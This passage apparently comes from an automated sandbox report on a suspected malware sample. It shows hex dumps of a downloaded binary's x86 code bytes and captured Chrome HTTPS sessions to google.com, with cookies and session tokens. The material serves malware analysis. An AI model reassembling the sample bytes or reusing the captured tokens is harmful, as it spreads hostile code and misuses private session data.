                                                                    Data Ascii: h#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3
                                                                    May 2, 2024 04:59:07.878057957 CEST1289INData Raw: 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c fd ff
                                                                    Data Ascii: O_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404Y
                                                                    May 2, 2024 04:59:07.878106117 CEST1289INData Raw: 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15
                                                                    Data Ascii: C{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0
                                                                    May 2, 2024 04:59:07.987895966 CEST1289INData Raw: 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56 83 ce
                                                                    Data Ascii: 3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@
                                                                    May 2, 2024 04:59:07.987936020 CEST1289INData Raw: ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85 c0 0f
                                                                    Data Ascii: AjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuW
                                                                    May 2, 2024 04:59:07.987996101 CEST1289INData Raw: 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a 01 04
                                                                    Data Ascii: }u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;|SA23~,FDMEuNGA;|u[_FMFMLU
                                                                    May 2, 2024 04:59:07.988066912 CEST1289INData Raw: 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d c8 88
                                                                    Data Ascii: uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"z
                                                                    May 2, 2024 04:59:07.988146067 CEST1289INData Raw: eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e c9 c3
                                                                    Data Ascii: UVEPPh1hIEt3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH^
                                                                    May 2, 2024 04:59:07.988235950 CEST1289INData Raw: de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00 00 75 0b a1 ec 13 4d 00 89 86 b0 01 00 00 8d 9e a0 01 00 00 53 8d be 9c 01 00
                                                                    Data Ascii: 9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=g
                                                                    May 2, 2024 04:59:07.988248110 CEST1289INData Raw: 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb b9 55 8b ec 53 8b 5d 08 83 e3 01 f6 45 08 02 56 8b f1 0f 84 e9 f6 03 00 57 68
                                                                    Data Ascii: ____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZMJZM@Z_M^4Z


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.2249164172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:47 UTC330OUTGET /chrome/whats-new/m109?internal=true HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    2024-05-02 02:59:48 UTC686INHTTP/1.1 404 Not Found
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    X-Content-Type-Options: nosniff
                                                                    Accept-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                                                                    Critical-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                                                                    Vary: Accept-Encoding, Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                                                                    Date: Thu, 02 May 2024 02:59:48 GMT
                                                                    Server: sffe
                                                                    Content-Length: 187622
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:48 UTC569INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 39 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 38 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 37 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22
                                                                    Data Ascii: <!DOCTYPE html>...[if IE 9 ]> <html class="no-js ie ie9 dir-ltr" lang="en" dir="ltr"> <![endif]-->...[if IE 8 ]> <html class="no-js ie ie8 dir-ltr" lang="en" dir="ltr"> <![endif]-->...[if IE 7 ]> <html class="no-js ie ie7 dir-ltr" lang="
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 6f 6f 6c 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63
                                                                    Data Ascii: "content-language" content="en-us"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link rel="preconnect" href="https://tools.google.com" > <link rel="preconnect" href="https://www.google-analytic
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 78 39 36 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72
                                                                    Data Ascii: <link rel="shortcut icon" type="image/png" sizes="32x32" href="/chrome/static/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="96x96" href="/chrome/static/images/favicons/favicon-96x96.png"> <link r
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 69 63 6f 6e 2d 31 35 32 78 31 35 32 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72
                                                                    Data Ascii: c/images/favicons/apple-icon-144x144.png"> <link rel="apple-touch-icon" type="image/png" sizes="152x152" href="/chrome/static/images/favicons/apple-icon-152x152.png"> <link rel="apple-touch-icon" type="image/png" sizes="180x180" hr
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 68 72 6f 6d 65 2d 6c 6f 67 6f 2e 73 76 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 3e 20 20 3c 21 2d 2d 5b 69 66 20 28 67 74 65 20 49 45 20 31 30 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 20 3c 73 63 72 69 70 74 3e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 27 4d 53 49 45 20 31 30 2e 30 27 29 20 3d 3d 3d 20 2d 31
                                                                    Data Ascii: <meta property="og:image" content="https://www.google.com/chrome/static/images/chrome-logo.svg"> <meta property="og:locale" content="en_US"> ...[if (gte IE 10)|!(IE)]>...> <script>navigator.userAgent.indexOf('MSIE 10.0') === -1
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6a 73 2f 67 77 65 62 2f 61 6e 61 6c 79 74 69 63 73 2f 61 75 74 6f 74 72 61 63 6b 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 76 61 72 20 67 61 43 6f 6f 6b 69 65 50 61 74 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 2f 63 68 72 6f 6d 65 2f 22 29 20 2b 20 38 29 3b 0a 20 20 77 69 6e 64 6f 77 2e 67 61 20 3d 20 6e 65 77 20 67 77 65 62 2e 61 6e 61 6c 79 74 69 63 73 2e 41 75 74 6f 54 72 61 63 6b 28 7b 0a 20 20 20 20 70 72 6f 66 69 6c 65 3a 20 27 55 41
                                                                    Data Ascii: rc="//www.google.com/js/gweb/analytics/autotrack.js"></script> <script> var gaCookiePath = window.location.pathname.substring(0, window.location.pathname.indexOf("/chrome/") + 8); window.ga = new gweb.analytics.AutoTrack({ profile: 'UA
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 65 72 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 6d 61 72 67 69 6e 3a 30 2e 36 37 65 6d 20 30 7d 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 70 72 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 20 6d 6f 6e 6f 73 70 61 63 65
                                                                    Data Ascii: er,nav,section{display:block}h1{font-size:2em;margin:0.67em 0}figcaption,figure{display:block}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0;overflow:visible}main{display:block}pre{font-family:monospace, monospace
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 62 6d 69 74 22 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 62 75 74 74 6f 6e 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 20 42 75 74 74 6f 6e 54 65 78 74 7d 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 7b 2d 77
                                                                    Data Ascii: bmit"]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type="button"]:-moz-focusring,[type="reset"]:-moz-focusring,[type="submit"]:-moz-focusring{outline:1px dotted ButtonText}input{overflow:visible}[type="checkbox"],[type="radio"]{-w
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 64 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 68 72 2d 6d 6f 64 61 6c 2e 73 68 6f 77 2c 2e 63 68 72 2d 6d 6f 64 61 6c 20 2e 73 68 6f 77 2c 2e 63 68 61 6e 6e 65 6c 2d 70 61 67 65 20 2e 63 68 72 2d 64 6f 77 6e 6c 6f 61 64 2d 6c 69 6e 6b 2e 73 68 6f 77 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 63 61 72 64 2d 66 61 64 65 2d 75 70 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 38 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 38 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f
                                                                    Data Ascii: d-link{display:none}.chr-modal.show,.chr-modal .show,.channel-page .chr-download-link.show{display:block !important}@-webkit-keyframes card-fade-up{from{opacity:0;-webkit-transform:translateY(-80px);transform:translateY(-80px)}to{opacity:1;-webkit-transfo
                                                                    2024-05-02 02:59:48 UTC1255INData Raw: 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 6f 75 74 2d 64 6f 77 6e 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 3b 2d
                                                                    Data Ascii: :0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes fade-out-down{from{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.2249168172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:50 UTC837OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
                                                                    2024-05-02 02:59:51 UTC1191INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 02:59:51 GMT
                                                                    Pragma: no-cache
                                                                    Expires: -1
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-IoSY7IUYzIU_ww8fVz8O9Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                    Accept-CH: Sec-CH-UA-Model
                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                    Permissions-Policy: unload=()
                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                    Server: gws
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    2024-05-02 02:59:51 UTC64INData Raw: 33 31 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 6c 6f 74 74 65 72 79 20 70 6f 77 65 72 62 61 6c 6c 20 6a 61 63 6b 70 6f 74 22
                                                                    Data Ascii: 318)]}'["",["nyt crossword clues","lottery powerball jackpot"
                                                                    2024-05-02 02:59:51 UTC735INData Raw: 2c 22 62 79 72 6f 6e 20 62 75 78 74 6f 6e 20 69 6e 6a 75 72 79 22 2c 22 66 69 73 68 69 6e 67 20 67 75 69 64 65 20 73 74 65 6c 6c 61 72 20 62 6c 61 64 65 22 2c 22 73 6c 69 70 6b 6e 6f 74 20 32 35 74 68 20 61 6e 6e 69 76 65 72 73 61 72 79 20 74 6f 75 72 20 64 61 74 65 73 22 2c 22 62 65 74 68 65 73 64 61 20 73 74 61 72 66 69 65 6c 64 20 75 70 64 61 74 65 22 2c 22 67 6f 6f 67 6c 65 20 6c 61 79 6f 66 66 73 20 6d 65 78 69 63 6f 22 2c 22 6b 65 6e 74 75 63 6b 79 20 62 61 73 6b 65 74 62 61 6c 6c 20 6b 6f 62 79 20 62 72 65 61 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 70 72 65 22 3a 30 2c 22 74 6c 77 22 3a 66
                                                                    Data Ascii: ,"byron buxton injury","fishing guide stellar blade","slipknot 25th anniversary tour dates","bethesda starfield update","google layoffs mexico","kentucky basketball koby brea"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":f
                                                                    2024-05-02 02:59:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.2249169172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:51 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 02:59:51 UTC1816INHTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwIp4PMsQYQ2cbPhQISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
